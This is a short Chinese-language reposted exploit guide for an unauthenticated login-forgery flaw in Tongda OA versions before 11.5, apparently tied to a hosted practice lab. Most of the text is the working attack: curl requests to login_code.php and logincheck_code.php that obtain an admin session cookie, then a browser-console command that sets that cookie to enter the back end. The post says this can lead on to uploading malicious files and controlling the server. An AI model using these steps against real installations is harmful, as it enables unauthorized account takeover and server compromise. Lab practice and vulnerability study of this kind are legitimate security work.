轉載自:【通達OA < 11.5 前臺任意僞造用戶登錄登錄繞過漏洞利用】 - https://store.vsplate.com/cn/post/518/
實驗地址:https://www.vsplate.com/?github=%2Fbbvuln%2Ftdoa%2Ftree%2Fmaster%2F11.3%2Fdc&autogo=1
2020年04月17日, 通達OA官方在更新了一個v11版本安全補丁, 其中修復了一個任意用戶僞造登錄漏洞。未經授權的攻擊者可以通過構造進行任意用戶登錄(包括admin),登錄之後可進一步上傳惡意文件控制網站服務器。通達OA是通達信科打造的協同辦公平臺,涵蓋了工作流程、電子郵件、即時通訊、公告通知、新聞、日程安排、工作日誌、知識管理,等近300個功能模塊,國內用戶衆多。
1.訪問 /general/login_code.php 獲取 codeuid
curl -v http://***.vsgo.cloud/general/login_code.php
2.用 codeuid 請求 /logincheck_code.php,獲取cookie
curl -v -d 'CODEUID=2AF415ED-E5A7-109A-4020-31B9D06ADD3A&UID=1' http://***.vsgo.cloud/logincheck_code.php
- 瀏覽器中打開 http://***.vsgo.cloud/general/ ,並在瀏覽器控制檯上執行:
document.cookie="PHPSESSID=67b0bacb8dd8e730c8b0f81303b1513a;"
- 刷新頁面,成功登錄後臺